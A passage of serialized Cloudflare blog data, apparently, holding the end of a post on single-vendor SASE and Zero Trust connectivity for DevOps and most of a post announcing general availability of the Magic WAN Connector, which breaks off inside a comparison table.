1.42Z\"></path></svg>\n </a>\n </div>\n <p>Complex continuous integration and continuous delivery (CI/CD) pipeline interaction is famous for being agile, so the connectivity and security supporting these workflows should match. DevOps teams too often rely on traditional <a href=\"https://www.cloudflare.com/learning/access-management/what-is-a-vpn/\">VPNs</a> to accomplish remote access to various development and operational tools. VPNs are cumbersome to manage, susceptible to exploit with known or zero-day vulnerabilities, and use a legacy hub-and-spoke connectivity model that is too slow for modern workflows.</p><p>Of any employee group, developers are particularly capable of finding creative workarounds that decrease friction in their daily workflows, so all corporate security measures need to “just work,” without getting in their way. Ideally, all users and servers across build, staging, and production environments should be orchestrated through centralized, Zero Trust <a href=\"https://www.cloudflare.com/learning/access-management/what-is-access-control/\">access controls</a>, no matter what components and tools are used and no matter where they are located. Ad hoc policy changes should be accommodated, as well as temporary Zero Trust access for contractors or even emergency responders during a production server incident.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"zero-trust-connectivity-for-devops\">Zero Trust connectivity for DevOps</h3>\n <a href=\"#zero-trust-connectivity-for-devops\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p><a href=\"https://www.cloudflare.com/learning/access-management/what-is-ztna/\">ZTNA</a> works well as an industry paradigm for secure, least-privileged user-to-app access, but it should extend further to secure networking use cases that involve server-initiated or bidirectional traffic. This follows an emerging trend that imagines an overlay mesh connectivity model across clouds, VPCs, or network segments without a reliance on routers. For true any-to-any connectivity, customers need flexibility to cover all of their network connectivity and application access use cases. Not every SASE vendor’s network on-ramps can extend beyond client-initiated traffic without requiring network routing changes or making security tradeoffs, so generic &quot;any-to-any connectivity&quot; claims may not be what they initially seem.</p>\n <figure class=\"kg-card kg-image-card kg-width-wide\">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6ZKS8DznwKSILFDtZB3uqO/9a3dc4cfaf7f63f12812d3286ef837aa/DevOps-Diagram---SVSASE-Blog.png\" alt=\"Diagram showing Cloudflare’s software connectors (on-ramps) securing DevOps workflows involving bidirectional traffic between developers and servers.\" class=\"kg-image\" width=\"1600\" height=\"891\" loading=\"lazy\"/>\n \n </figure><p>Cloudflare extends the reach of ZTNA to ensure all user-to-app use cases are covered, plus mesh and P2P secure networking to make connectivity options as broad and flexible as possible. DevOps service-to-service workflows can run efficiently on the same platform that accomplishes ZTNA, VPN replacement, or enterprise-class SASE. Cloudflare acts as the connectivity “glue” across all DevOps users and resources, regardless of the flow of traffic at each step. This same technology, i.e., <a href=\"https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/private-net/warp-connector/\">WARP Connector</a>, enables admins to manage different private networks with overlapping IP ranges — VPC &amp; RFC1918, support server-initiated traffic and P2P apps (e.g., SCCM, AD, VoIP &amp; SIP traffic) connectivity over existing private networks, build P2P private networks (e.g., CI/CD resource flows), and deterministically route traffic. Organizations can also automate management of their SASE platform with Cloudflare’s Terraform provider.</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"the-cloudflare-difference\">The Cloudflare difference</h2>\n <a href=\"#the-cloudflare-difference\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Cloudflare’s single-vendor SASE platform, <a href=\"https://www.cloudflare.com/zero-trust/\">Cloudflare One</a>, is built on our <a href=\"https://www.cloudflare.com/connectivity-cloud/\">connectivity cloud</a> — the next evolution of the public cloud, providing a unified, intelligent platform of programmable, composable services that enable connectivity between all networks (enterprise and Internet), clouds, apps, and users. Our connectivity cloud is flexible enough to make &quot;any-to-any connectivity&quot; a more approachable reality for organizations <a href=\"https://www.cloudflare.com/learning/access-management/how-to-implement-zero-trust/\">implementing</a> a SASE architecture, accommodating deployment preferences alongside prescriptive guidance. Cloudflare is built to offer the breadth and depth needed to help organizations regain IT control through single-vendor SASE and beyond, while simplifying workflows for every team that contributes along the way.</p><p>Other SASE vendors designed their data centers for egress traffic to the Internet. They weren’t designed to handle or secure East-West traffic, providing neither middle mile nor security services for traffic passing from branch to HQ or branch to branch. Cloudflare’s middle mile global backbone supports security and networking for any-to-any connectivity, whether users are on-prem or remote, and whether apps are in the data center or in the cloud.</p><p>To learn more, read our reference architecture, “<a href=\"https://developers.cloudflare.com/reference-architecture/sase-reference-architecture/\">Evolving to a SASE architecture with Cloudflare</a>,” or <a href=\"https://www.cloudflare.com/products/zero-trust/plans/enterprise/\">talk to a Cloudflare One expert</a>.</p>"],"published_at":[0,"2024-02-07T14:00:55.000+00:00"],"updated_at":[0,"2024-10-09T23:26:55.930Z"],"feature_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/45PN3ZufXc3c7daGSIzmvt/7798132c3b38d60e9b6b82a235054e1d/single-vendor-sase-announcement-2024.png"],"tags":[1,[[0,{"id":[0,"2UI24t7uddD0CIIUJCu1f4"],"name":[0,"SASE"],"slug":[0,"sase"]}],[0,{"id":[0,"J61Eszqn98amrYHq4IhTx"],"name":[0,"Zero Trust"],"slug":[0,"zero-trust"]}],[0,{"id":[0,"4XO58hIDD4ga4tgfILkz4o"],"name":[0,"DevOps"],"slug":[0,"devops"]}],[0,{"id":[0,"4Z2oveL0P0AeqGa5lL4Vo1"],"name":[0,"Cloudflare One"],"slug":[0,"cloudflare-one"]}],[0,{"id":[0,"7r0zxUQ3XCgTw2blCdlw55"],"name":[0,"Magic WAN"],"slug":[0,"magic-wan"]}],[0,{"id":[0,"39YnBh0ODqLzK2iQmsa0tM"],"name":[0,"WARP Connector"],"slug":[0,"warp-connector"]}],[0,{"id":[0,"6QktrXeEFcl4e2dZUTZVGl"],"name":[0,"Product News"],"slug":[0,"product-news"]}],[0,{"id":[0,"5OywGP63AdM9Umyvaku8OP"],"name":[0,"Connectivity Cloud"],"slug":[0,"connectivity-cloud"]}]]],"relatedTags":[0],"authors":[1,[[0,{"name":[0,"Michael Keane"],"slug":[0,"michael-keane"],"bio":[0,null],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7AgGlX4fAKbcleNYCthPeh/399c46444fe39e400cec4eabed2c35f6/michael-keane.jpg"],"location":[0,null],"website":[0,null],"twitter":[0,null],"facebook":[0,null]}]]],"meta_description":[0,"Today, we are announcing a series of updates to our SASE platform, Cloudflare One, that further the promise of a single-vendor SASE architecture."],"primary_author":[0,{}],"localeList":[0,{"name":[0,"Fulfilling the promise of single-vendor SASE through network modernization Config"],"enUS":[0,"English for Locale"],"zhCN":[0,"Translated for Locale"],"zhHansCN":[0,"No Page for Locale"],"zhTW":[0,"Translated for Locale"],"frFR":[0,"Translated for Locale"],"deDE":[0,"Translated for Locale"],"itIT":[0,"No Page for Locale"],"jaJP":[0,"Translated for Locale"],"koKR":[0,"Translated for Locale"],"ptBR":[0,"No Page for Locale"],"esLA":[0,"No Page for Locale"],"esES":[0,"Translated for Locale"],"enAU":[0,"No Page for Locale"],"enCA":[0,"No Page for Locale"],"enIN":[0,"No Page for Locale"],"enGB":[0,"No Page for Locale"],"idID":[0,"No Page for Locale"],"ruRU":[0,"No Page for Locale"],"svSE":[0,"No Page for Locale"],"viVN":[0,"No Page for Locale"],"plPL":[0,"No Page for Locale"],"arAR":[0,"No Page for Locale"],"nlNL":[0,"No Page for Locale"],"thTH":[0,"No Page for Locale"],"trTR":[0,"No Page for Locale"],"heIL":[0,"No Page for Locale"],"lvLV":[0,"No Page for Locale"],"etEE":[0,"No Page for Locale"],"ltLT":[0,"No Page for Locale"]}],"url":[0,"https://blog.cloudflare.com/single-vendor-sase-announcement-2024"],"metadata":[0,{"title":[0,"Fulfilling the promise of single-vendor SASE through network modernization"],"description":[0,"Today, we are announcing a series of updates to our SASE platform, Cloudflare One, that further the promise of a single-vendor SASE architecture."],"imgPreview":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6vfjqBgz5kdOsVQDaZJQrW/0c9452a392356dc11bbcea0cbec5c42b/single-vendor-sase-announcement-2024-DZAqRD.png"]}]}],[0,{"id":[0,"Rf29gLGgJJqRz3DJoViF1"],"title":[0,"Announcing General Availability for the Magic WAN Connector: the easiest way to jumpstart SASE transformation for your network"],"slug":[0,"magic-wan-connector-general-availability"],"excerpt":[0,"We’re announcing the general availability of the Magic WAN Connector, which serves as the glue between your existing network hardware and Cloudflare’s networ"],"featured":[0,false],"html":[0,"<p></p>\n <figure class=\"kg-card kg-image-card \">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6C3g58PPEB5JrT1nTVF2Fp/27aa99e113979042f578d83b50c35aea/Magic-WAN-Connector--buy-our-box-or-BYO-.png\" alt=\"\" class=\"kg-image\" width=\"1600\" height=\"900\" loading=\"lazy\"/>\n \n </figure><p>Today, we’re announcing the general availability of the <a href=\"https://www.cloudflare.com/network-services/products/magic-wan/\">Magic WAN Connector</a>, a key component of our <a href=\"https://www.cloudflare.com/learning/access-management/what-is-sase/\">SASE</a> platform, Cloudflare One. Magic WAN Connector is the glue between your existing network hardware and Cloudflare’s network — it provides a super simplified software solution that comes pre-installed on Cloudflare-certified hardware, and is entirely managed from the Cloudflare One dashboard.</p><p>It takes only a few minutes from unboxing to seeing your network traffic automatically routed to the closest Cloudflare location, where it flows through a full stack of Zero Trust security controls before taking an accelerated path to its destination, whether that’s another location on your private network, a SaaS app, or any application on the open Internet.</p><p>Since we <a href=\"/magic-wan-connector/\">announced</a> our beta earlier this year, organizations around the world have deployed the Magic WAN Connector to connect and secure their network locations. We’re excited for the general availability of the Magic WAN Connector to accelerate SASE transformation at scale.</p><p>When customers tell us about their journey to embrace SASE, one of the most common stories we hear is:</p><blockquote><p><i>We started with our remote workforce, deploying modern solutions to secure access to internal apps and Internet resources. But now, we’re looking at the broader landscape of our enterprise network connectivity and security, and it’s daunting. We want to shift to a cloud and Internet-centric model for all of our infrastructure, but we’re struggling to figure out how to start.</i></p></blockquote><p>The Magic WAN Connector was created to address this problem.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"zero-touch-connectivity-to-your-new-corporate-wan\">Zero-touch connectivity to your new corporate WAN</h3>\n <a href=\"#zero-touch-connectivity-to-your-new-corporate-wan\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p><a href=\"https://www.cloudflare.com/cloudflare-one/\">Cloudflare One</a> enables organizations of any size to connect and secure all of their users, devices, <a href=\"https://www.cloudflare.com/application-services/solutions/\">applications</a>, networks, and data with a unified platform delivered by our global <a href=\"https://www.cloudflare.com/connectivity-cloud/\">connectivity cloud</a>. <a href=\"https://www.cloudflare.com/network-services/products/magic-wan/\">Magic WAN</a> is the network connectivity “glue” of Cloudflare One, allowing our customers to migrate away from legacy private circuits and use our network as an extension of their own.</p><p>Previously, customers have connected their locations to Magic WAN with Anycast GRE or IPsec tunnels configured on their edge network equipment (usually existing routers or firewalls), or plugged into us directly with <a href=\"https://www.cloudflare.com/network-services/products/network-interconnect/\">CNI</a>. But for the past few years, we’ve heard requests from hundreds of customers asking for a zero-touch approach to connecting their branches: <i>We just want something we can plug in and turn on, and it handles the rest.</i></p><p>The Magic WAN Connector is exactly this. Customers receive Cloudflare-certified hardware with our software pre-installed on it, and everything is controlled via the Cloudflare dashboard. What was once a time-consuming, complex process now takes a matter of minutes, enabling robust Zero-Trust protection for all of your traffic. </p><p>In addition to automatically configuring tunnels and routing policies to direct your network traffic to Cloudflare, the Magic WAN Connector will also handle traffic steering, shaping and failover to make sure your packets always take the best path available to the closest Cloudflare network location — which is likely only milliseconds away. You’ll also get enhanced visibility into all your traffic flows in analytics and logs, providing a unified observability experience across both your branches and the traffic through Cloudflare’s network.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"zero-trust-security-for-all-your-traffic\">Zero Trust security for all your traffic</h3>\n <a href=\"#zero-trust-security-for-all-your-traffic\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Once the Magic WAN Connector is deployed at your network location, you have automatic access to enforce Zero Trust security policies across both public and private traffic.</p>\n <figure class=\"kg-card kg-image-card \">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6kj1RPtJdlJHyz4A5kwDb8/e0c0f7cac3b5f849c102ee4e2d31be42/Branch-Connector-Diagram.png\" alt=\"\" class=\"kg-image\" width=\"1600\" height=\"782\" loading=\"lazy\"/>\n \n </figure><h4>A secure on-ramp to the Internet</h4><p>An easy first step to improving your organization’s security posture after connecting network locations to Cloudflare is creating Secure Web Gateway policies to defend against ransomware, phishing, and other threats for faster, safer Internet browsing. By default, all Internet traffic from locations with the Magic WAN Connector will route through Cloudflare Gateway, providing a unified management plane for traffic from physical locations and remote employees.</p><h4>A more secure private network</h4><p>The Magic WAN Connector also enables routing private traffic between your network locations, with multiple layers of network and Zero Trust security controls in place. Unlike a traditional network architecture, which requires deploying and managing a stack of security hardware and backhauling branch traffic through a central location for filtering, a SASE architecture provides private traffic filtering and control built-in: enforced across a distributed network, but managed from a single dashboard interface or API.</p><h4>A simpler approach for hybrid cloud</h4><p>Cloudflare One enables connectivity for any physical or <a href=\"https://www.cloudflare.com/learning/cloud/what-is-cloud-networking/\">cloud network</a> with easy on-ramps depending on location type. The Magic WAN Connector provides easy connectivity for branches, but also provides automatic connectivity to other networks including VPCs connected using cloud-native constructs (e.g., VPN Gateways) or direct cloud connectivity (via <a href=\"/cloud-cni/\">Cloud CNI</a>). With a unified connectivity and control plane across physical and cloud infrastructure, IT and security teams can reduce overhead and cost of managing multi- and hybrid cloud networks.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"single-vendor-sase-dramatically-reduces-cost-and-complexity\">Single-vendor SASE dramatically reduces cost and complexity</h3>\n <a href=\"#single-vendor-sase-dramatically-reduces-cost-and-complexity\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>With the general availability of the Magic WAN Connector, we’ve put the final piece in place to deliver a unified SASE platform, developed and fully integrated from the ground up. Deploying and managing all the components of SASE with a single vendor, versus piecing together different solutions for <a href=\"https://www.cloudflare.com/network-security/\">networking and security</a>, significantly simplifies deployment and management by reducing complexity and potential integration challenges. Many vendors that market a full SASE solution have actually stitched together separate products through acquisition, leading to an un-integrated experience similar to what you would see deploying and managing multiple separate vendors. In contrast, Cloudflare One (now with the Magic WAN Connector for simplified branch functions) enables organizations to achieve the true promise of SASE: a simplified, efficient, and highly secure network and security infrastructure that reduces your total cost of ownership and adapts to the evolving needs of the modern digital landscape.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"evolving-beyond-sd-wan\">Evolving beyond SD-WAN</h3>\n <a href=\"#evolving-beyond-sd-wan\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Cloudflare One addresses many of the challenges that were left behind as organizations deployed SD-WAN to help simplify networking operations. SD-WAN provides orchestration capabilities to help manage devices and configuration in one place, as well as last mile traffic management to steer and shape traffic based on more sophisticated logic than is possible in traditional routers. But SD-WAN devices generally don&#39;t have embedded security controls, leaving teams to stitch together a patchwork of hardware, virtualized and cloud-based tools to keep their networks secure. They can make decisions about the best way to send traffic out from a customer’s branch, but they have no way to influence traffic hops between the last mile and the traffic&#39;s destination. And while some SD-WAN providers have surfaced virtualized versions of their appliances that can be deployed in cloud environments, they don&#39;t support native cloud connectivity and can complicate rather than ease the transition to cloud.</p><p>Cloudflare One represents the next evolution of enterprise networking, and has a fundamentally different architecture from either legacy networking or SD-WAN. It&#39;s based on a &quot;light branch, heavy cloud&quot; principle: deploy the minimum required hardware within physical locations (or virtual hardware within virtual networks, e.g., cloud VPCs) and use low-cost Internet connectivity to reach the nearest &quot;service edge&quot; location. At those locations, traffic can flow through security controls and be optimized on the way to its destination, whether that&#39;s another location within the customer&#39;s private network or an application on the public Internet. This architecture also enables remote user access to connected networks.</p><p>This shift — moving most of the &quot;smarts&quot; from the branch to a distributed global network edge, and leaving only the functions at the branch that absolutely require local presence, delivered by the Magic WAN Connector — solves our customers’ current problems and sets them up for <a href=\"https://www.cloudflare.com/cybersecurity-risk-management/\">easier management and a stronger security posture</a> as the connectivity and attack landscape continues to evolve.</p><!--kg-card-begin: html--><table style=\"border:none;border-collapse:collapse;\"><colgroup><col width=\"109\"><col width=\"124\"><col width=\"136\"><col width=\"169\"><col width=\"169\"></colgroup><tbody><tr style=\"height:23.25pt\"><td style=\"border-left:solid #c1c7d0 1pt;border-right:solid #c1c7d0 1pt;border-bottom:solid #c1c7d0 1pt;border-top:solid #c1c7d0 1pt;vertical-align:middle;background-color:#003682;padding:0pt 7pt 0pt 7pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.38;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#ffffff;background-color:transparent;font-weight:700;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Aspect</span></p></td><td style=\"border-left:solid #c1c7d0 1pt;border-right:solid #c1c7d0 1pt;border-bottom:solid #c1c7d0 1pt;border-top:solid #c1c7d0 1pt;vertical-align:middle;background-color:#003682;padding:0pt 7pt 0pt 7pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.38;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#ffffff;background-color:transparent;font-weight:700;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Example</span></p></td><td style=\"border-left:solid #c1c7d0 1pt;border-right:solid #c1c7d0 1pt;border-bottom:solid #c1c7d0 1pt;border-top:solid #c1c7d0 1pt;vertical-align:middle;background-color:#003682;padding:0pt 7pt 0pt 7pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.38;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#ffffff;background-color:transparent;font-weight:700;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">MPLS/VPN Service</span></p></td><td style=\"border-left:solid #c1c7d0 1pt;border-right:solid #c1c7d0 1pt;border-bottom:solid #c1c7d0 1pt;border-top:solid #c1c7d0 1pt;vertical-align:middle;background-color:#003682;padding:0pt 7pt 0pt 7pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.38;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#ffffff;background-color:transparent;font-weight:700;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">SD-WAN</span></p></td><td style=\"border-left:solid #c1c7d0 1pt;border-right:solid #c1c7d0 1pt;border-bottom:solid #c1c7d0 1pt;border-top:solid #c1c7d0 1pt;vertical-align:middle;background-color:#003682;padding:7pt 7pt 7pt 7pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.38;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#ffffff;background-color:transparent;font-weight:700;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">SASE with&nbsp;</span></p><p dir=\"ltr\" style=\"line-height:1.38;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#ffffff;background-color:transparent;font-weight:700;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Cloudflare One&nbsp;</span></p></td></tr><tr style=\"height:57pt\"><td style=\"border-left:solid #c1c7d0 1pt;border-right:solid #c1c7d0 1pt;border-bottom:solid #a9afa9 1pt;border-top:solid #c1c7d0 1pt;vertical-align:middle;background-color:#e2f5fa;padding:0pt 7pt 0pt 7pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.38;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:600;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Configuration</span></p></td><td style=\"border-left:solid #c1c7d0 1pt;border-right:solid #c1c7d0 1pt;border-bottom:solid #a9afa9 1pt;border-top:solid #c1c7d0 1pt;vertical-align:middle;padding:0pt 7pt 0pt 7pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.38;margin-left: 0pt;margin-right: 0pt;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">New site setup, configuration and management</span></p></td><td style=\"border-left:solid #c1c7d0 1pt;border-right:solid #c1c7d0 1pt;border-bottom:solid #a9afa9 1pt;border-top:solid #c1c7d0 1pt;vertical-align:middle;background-color:#f4cccc;padding:0pt 7pt 0pt 7pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.38;margin-left: 0pt;margin-right: 0pt;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">By MSP through service request</span></p></td><td style=\"border-left:solid #c1c7d0 1pt;border-right:solid #c1c7d0 1pt;border-bottom:solid #a9afa9 1pt;border-top:solid #c1c7d0 1pt;vertical-align:middle;background-color:#e3fcef;padding:0pt 7pt 0pt 7pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.38;margin-left: 0pt;margin-right: 0pt;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Simplified orchestration and&nbsp; </span><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\"><br></span><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">management via centralized controller</span></p></td><td style=\"border-left:solid #c1c7d0 1pt;border-right:solid #c1c7d0 1pt;border-bottom:solid #a9afa9 1pt;border-top:solid #c1c7d0 1pt;vertical-align:middle;background-color:#e3fcef;padding:7pt 7pt 7pt 7pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.38;margin-left: 0pt;margin-right: 0pt;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Automated orchestration via SaaS portal</span></p><p dir=\"ltr\" style=\"line-height:1.38;margin-left: 0pt;margin-right: 0pt;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span style=\"font-size:9pt;font-family:Inter,sans-serif;color:#172b4d;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre;white-space:pre-wrap;\">Single Dashboard</span></p></td></tr><tr style=\"height:57pt\"><td style=\"border-left:solid #c1c7d0 1pt;border-right:solid #c1c7d0 1pt;border-bottom:solid #a9afa9 1pt;border-top:solid #a9afa9 1pt;vertical-align:middle;background-color:#e2f5fa;padding:0pt 7pt 0pt 7pt;overflow:hidden;overflow-wrap:break-word;\"><p dir=\"ltr\" style=\"line-height:1.38;margin-left: 0pt;margin-right: 0pt;text-align: center;margin-top:0pt;margin-bottom:0pt;\"><span 